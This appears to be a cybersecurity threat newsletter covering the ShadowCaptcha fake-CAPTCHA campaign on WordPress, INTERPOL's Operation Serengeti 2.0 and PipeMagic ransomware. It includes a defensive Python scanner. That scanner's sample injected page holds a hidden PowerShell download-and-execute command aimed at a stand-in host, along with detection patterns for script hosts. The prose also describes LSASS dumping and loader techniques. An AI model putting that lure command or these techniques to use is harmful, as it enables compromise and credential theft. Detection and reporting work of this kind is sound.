This month focuses on the ShadowCaptcha Campaign targeting WordPress sites, INTERPOL’s Operation Serengeti 2.0, and the PipeMagic RansomExx Malware exploiting a Microsoft Windows Vulnerability.
Compromised WordPress sites exploited by ShadowCaptcha
ShadowCaptcha, first detected in August 2025, has so far used more than 100 compromised WordPress sites to deliver information stealers, ransomware, and cryptocurrency miners.
Summary
- Visitors to infected sites are redirected via injected JavaScript to fake CAPTCHA pages posing as Cloudflare or Google.
- Outcomes include deployment of Lumma and Rhadamanthys stealers, Epsilon Red ransomware, and sometimes XMRig-based cryptocurrency miners.
- The campaign employs anti-debugging checks, DLL side-loading, and clipboard manipulation (the fake CAPTCHA silently copies an attacker-supplied command to the victim's clipboard and instructs them to paste it into the Windows Run dialog) to enhance stealth and execution.
- Some miners pull their configuration dynamically from Pastebin, and attackers load vulnerable drivers such as WinRing0x64.sys to obtain kernel-level access that improves mining efficiency.
- Researchers suspect compromises stem from plugin exploits and stolen WordPress administrator credentials.
- ShadowCaptcha illustrates the evolution of social engineering into full-spectrum cyber operations, blending living-off-the-land binaries, obfuscation, and layered payloads.
- In parallel, GoDaddy detailed the Help TDS system (active since 2017), which powers tech support scams, credential theft, and malicious WordPress plugins like woocommerce_inputs, installed on over 10,000 sites worldwide.
- We recommend user awareness training, enabling MFA on WordPress, patching plugins, and network segmentation to limit spread.
- Read more about it here
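The injection described above (a script that copies a command to the clipboard and a page that poses as a Cloudflare or Google verification) can be hunted for in page source. The following is an added example, not code from the original article or from the researchers who reported ShadowCaptcha; the indicator strings are generic ClickFix-style heuristics (an assumption), not the campaign's actual strings, and the two HTML pages are constructed for illustration.

```python
"""Heuristic scan of a WordPress page for a ClickFix-style fake-CAPTCHA injection.

Added example, not code from the original newsletter or any vendor's research.
The indicators are generic ClickFix traits (assumption), not ShadowCaptcha IOCs.
"""
import re
from html.parser import HTMLParser

# Checked only inside inline <script> bodies: traits of a page that pushes a
# command to the clipboard for the victim to paste into Win+R (assumption).
SCRIPT_INDICATORS = {
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I),
    "script_host": re.compile(r"\b(mshta|powershell|cmd\.exe|rundll32|msiexec)\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b", re.I),
}
# Checked over the whole document: the social-engineering text of the lure.
TEXT_INDICATORS = {
    "run_dialog_lure": re.compile(r"win\s*\+\s*r|windows\s*key|press\s+enter", re.I),
    "fake_captcha_brand": re.compile(r"cloudflare|recaptcha|i am not a robot", re.I),
}


class ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and external script src URLs."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.inline = []
        self.external = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.in_script = True
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and data.strip():
            self.inline.append(data)


def scan_page(html, site_host):
    """Return {indicator_name: first matched snippet} for one page."""
    parser = ScriptCollector()
    parser.feed(html)
    hits = {}
    for body in parser.inline:
        for name, rx in SCRIPT_INDICATORS.items():
            m = rx.search(body)
            if m:
                hits.setdefault(name, m.group(0))
    for name, rx in TEXT_INDICATORS.items():
        m = rx.search(html)
        if m:
            hits.setdefault(name, m.group(0))
    # Scripts loaded from a host other than the site itself deserve review on a
    # site suspected of injection (assumption: the site only serves first-party JS).
    for src in parser.external:
        host = re.sub(r"^(https?:)?//", "", src).split("/")[0]
        if host and host.lower() != site_host.lower():
            hits.setdefault("third_party_script", src)
    return hits


def is_suspicious(hits):
    """High confidence: a clipboard write combined with a script host or hidden window."""
    return "clipboard_write" in hits and ("script_host" in hits or "hidden_window" in hits)


# Constructed sample pages (not captured from a real site).
CLEAN_PAGE = """<html><head>
<script src="https://example-blog.test/wp-includes/js/jquery.js"></script>
</head><body><h1>Hello</h1></body></html>"""

INJECTED_PAGE = """<html><head>
<script src="https://example-blog.test/wp-includes/js/jquery.js"></script>
<script src="https://cdn-check.invalid/verify.js"></script></head>
<body><div id="captcha">Verify you are human - Cloudflare</div>
<script>
  var c = "powershell -w hidden -c \\"iwr http://lure.invalid/x|iex\\"";
  navigator.clipboard.writeText(c);
  document.getElementById("captcha").innerText = "Press Win+R, then Ctrl+V and Enter";
</script></body></html>"""

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        hits = scan_page(page, "example-blog.test")
        print(label, is_suspicious(hits), sorted(hits))
```

Run it over saved copies of a site's front page and a few post pages (for example fetched with a plain HTTP client, since the injected script often only fires in a browser). A single text indicator on its own is weak evidence; the combination in is_suspicious is what separates a lure from a blog post that merely mentions PowerShell.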
INTERPOL’s Operation Serengeti 2.0
Operation Serengeti 2.0 (June–August 2025) led to 1,209 arrests across 18 African countries, targeting cybercriminals involved in ransomware, scams, and BEC attacks.
Summary
- Authorities recovered $97.4 million and dismantled 11,432 malicious infrastructures, highlighting the scale of global cybercrime.
- In Angola, police shut down 25 illegal cryptocurrency mining centers, arresting 60 Chinese nationals and seizing $37 million worth of power stations, mining rigs, and IT equipment.
- Zambia dismantled a massive online investment fraud that scammed 65,000 victims out of $300 million, arresting 15 suspects and seizing domains, accounts, and SIM cards.
- A transnational inheritance scam originating in Germany was dismantled, with the primary suspect arrested and valuables worth $1.6 million confiscated.
- INTERPOL emphasized that the operation builds stronger cross-border cooperation, intelligence sharing, and investigative capacity among member countries.
- Private partners like Group-IB and TRM Labs provided intelligence on cryptocurrency scams, BEC campaigns, and ransomware groups such as Bl00dy and RansomHub.
- Participating countries included Angola, Nigeria, Ghana, South Africa, Kenya, Zambia, Rwanda, Mauritius, Seychelles, and the U.K., among others.
- The crackdown coincided with Nigeria deporting 102 convicted foreign nationals (60 Chinese, 39 Filipinos, and others) linked to cyber fraud and cyber terrorism.
- The campaign follows earlier operations like Red Card (Nov 2024–Feb 2025), which resulted in 306 arrests and 1,842 device seizures, showing continuity in global anti-cybercrime efforts.
- Read more about it on the Interpol Website.
PipeMagic RansomExx Malware Exploiting Microsoft Windows Vulnerability
Cybersecurity researchers revealed that threat actors exploited CVE-2025-29824, a Windows CLFS privilege escalation flaw patched in April 2025, to deploy PipeMagic malware in RansomExx ransomware attacks.
Summary
- PipeMagic, first documented in 2022, acts as a modular backdoor capable of remote access, command execution, and payload delivery.
- Earlier infection chains included exploits like CVE-2017-0144 (EternalBlue SMB flaw) and fake ChatGPT apps used as lures in 2024 attacks in Saudi Arabia.
- Microsoft attributes recent attacks using CVE-2025-29824 and PipeMagic to a threat group tracked as Storm-2460.
- A distinctive trait of PipeMagic is its use of named pipes for communication: it generates a random 16-byte identifier to name the pipe over which encrypted payloads are received.
- The malware is plugin-based and uses Microsoft Azure-hosted infrastructure; in 2025 attacks, a malicious Microsoft Help Index file (metafile.mshi) acted as a loader.
- The loader contains obfuscated C# code that decrypts and executes embedded shellcode, which in turn launches the backdoor; other variants used DLL hijacking, with the malicious DLL disguised as a Chrome update.
- PipeMagic's modules include an asynchronous communication module for file operations, a loader for injecting payloads, and an injector for launching C# executables.
- The 2025 variants show improved persistence and lateral movement, including a renamed copy of ProcDump (dllhost.exe) used to dump LSASS memory for credential theft.
- PipeMagic's modular C2 framework allows dynamic payload execution, granular control, and stealthy memory-only operation: payloads are held in doubly linked lists in memory rather than written to disk.
- Attacks linked to Storm-2460 span IT, financial, and real estate sectors across the U.S., Europe, South America, and the Middle East, highlighting its global reach.
- Read more about it here
Sources
- https://www.betterworldtechnology.com/post/shadowcaptcha-campaign-targets-wordpress-sites-with-malware
- https://www.interpol.int/en/News-and-Events/News/2025/African-authorities-dismantle-massive-cybercrime-and-fraud-networks-recover-millions
- https://thehackernews.com/2025/08/microsoft-windows-vulnerability.html